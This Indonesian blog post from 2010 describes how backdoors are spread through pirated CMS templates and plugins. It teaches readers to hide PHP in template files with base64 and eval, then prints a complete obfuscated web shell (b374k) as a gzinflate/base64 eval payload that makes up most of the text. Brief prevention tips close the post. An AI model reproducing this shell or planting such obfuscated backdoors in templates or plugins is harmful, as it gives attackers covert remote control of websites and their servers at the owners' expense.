Penyebaran Backdoor Makin Beragam

By Cruz3N | on December 27th, 2010 | 3 Comments

Ini postingan singkat aja yah Grin Maklum lagi nulis TA pusing banget. Back to the topic neh, oke entah karena dah suntuk, bosen atau gak ada kerjaan sama sekali ROTFL sekarang orang menyebarkan backdoor lewat perantara template, plugin, component, dkk yang biasanya terdapat pada CMS Opensource terkenal kayak WordPress, Joomla, Drupal, dll. Jadi dah gak kayak dulu dimana kita susah payah melakukan take over websitenya entah dengan ribuan tehnik yang kita punya Grin dan langsung pasang tuh backdoor.

Mungkin bagi beberapa dari kalian informasi ini cukup basi cuman masih tergolong ampuh menurut saya. Apalagi dengan adanya situs-situs torrent/warez yang banyak tersedia template-template keren disana. Bohong aja kalo gak ada yang download Pissed Off Belum lagi beberapa orang yang memang kurang mengerti pemrograman mana mau tahu dengan kode-kode yang terdapat di dalamnya.

Tehnik Yang Digunakan

Sebenarnya tehnik yang digunakan cukup beragam, apa entah langsung menaruh aja file backdoornya bersamaan dengan template, atau menyisipkan di dalam kode-kode templatenya.

Contoh sederhananya seperti berikut… Dibawah ini saya menggunakan base_64 untuk melakukan encoding terhadap backdoor / kode-kode yang berbahaya. Kenapa menggunakan base_64? Karena pada PHP base_64 memiliki fungsi untuk melakukan encode dan decode. Jadi bukan seperti md5 dan sha1 yang merupakan one way hash yang tidak memiliki fungsi decrypt. Mungkin di crack bisa cuman pastinya ribet Question

Oke katakanlah kode berbahaya kita seperti berikut

<?php echo "Gua Backdoor"; ?>

Setelah itu kita akan melakukan encoding dengan base_64, kalian bisa langsung aja kesini http://www.rbl.jp/base64.php. Kemudian paste kode berikut…

echo "Gua Backdoor";

Lalu klik encode

Penyebaran Backdoor Makin Beragam

Maka hasilnya akan seperti berikut.

Penyebaran Backdoor Makin Beragam

ZWNobyAiR3VhIEJhY2tkb29yIjs=

Kemudian hapus kode file kita yang lama dan ganti menjadi seperti berikut

<?php $code = "ZWNobyAiR3VhIEJhY2tkb29yIjs="; @eval(base64_decode($code)); ?>

Hasil yang kita dapat akan sama Devil Nah berikut adalah contoh shellnya Om Ketek, b374k.php yang dah di encode

<?php  // ketek90@gmail.com // no malware on this code, you can check it by yourself Wink  @error_reporting(0); @set_time_limit(0);   $code = "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";  @eval(gzinflate(base64_decode($code))); ?>

Hampir sama kan?

Pencegahan?

Tingkat kesulitan yang akan kita hadapi untuk melakukan pengecekan dan pencegahannya seh gampang-gampang susah. Tergantung tehnik dari si pemasang backdoor tersebut.

  • Kalo mau ribet yah di cek-in satu persatu kode-kodenya. Cuman emang butuh kesabaran dan ketelitian, perhatikan ada gak tulisan-tulisan “acak” disana
  • Update AV kamu karena beberapa backdoor bisa terdeteksi. Saran saya seh Clam AV. Walaupun dia gak bisa hapus cuman hasil scanningnya mantap.
  • Most users never read, only see download button. Yup intinya baca-baca dulu sebelum mendownload sesuatu. Liat komentar-komentarnya, perhatikan sudah berapa kali file tersebut di download / popularitasnya.
  • Jangan mendownload sesuatu di tempat-tempat yang kurang meyakinkan
  • Untuk pengguna WordPress kalian bisa menggunakan plugin ini untuk mengecek apakah terdapat kode-kode berbahaya di dalam template. Tapi lain lagi kalo backdoornya justru ada di dalam plugin Hypnotized
  • Belajar bahasa pemrograman yang paling penting dari semuanya diatas Evil Grin

